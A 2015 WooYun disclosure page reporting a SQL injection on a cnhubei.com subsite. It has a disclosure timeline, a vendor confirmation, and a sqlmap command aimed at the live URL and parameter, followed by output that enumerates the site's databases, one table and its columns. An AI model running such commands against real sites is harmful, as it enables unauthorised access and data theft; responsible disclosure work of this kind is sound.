当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146050

漏洞标题:荆楚网某分站SQL注射问题

相关厂商:荆楚网

漏洞作者: 冷白开。

提交时间:2015-10-12 11:09

修复时间:2015-11-30 17:50

公开时间:2015-11-30 17:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

荆楚网某分站SQL注射问题

详细说明:

sqlmap.py -u "http://fapp.cnhubei.com/wall_wsjb/index.php?wtype=1" --dbs

1.png

available databases [16]:
[*] information_schema
[*] wall
[*] wall10
[*] wall11
[*] wall2
[*] wall3
[*] wall4
[*] wall5
[*] wall6
[*] wall7
[*] wall8
[*] wall9
[*] wall_45j
[*] wall_wd
[*] wall_wsjb
[*] wallc
Database: wall_wsjb
[1 table]
+------------+
| hehun_love |
+------------+
Database: wall_wsjb
Table: hehun_love
[9 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| hehun_class | int(10) |
| hehun_cs | int(10) |
| hehun_date | varchar(30) |
| hehun_head | varchar(16) |
| hehun_id | int(10) |
| hehun_images | int(15) |
| hehun_lr | mediumtext |
| hehun_sign | varchar(16) |
| wtype | varchar(20) |
+--------------+-------------+

漏洞证明:

存在注入

修复方案:

你们专业

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-16 17:49

厂商回复:

感谢!

最新状态:

暂无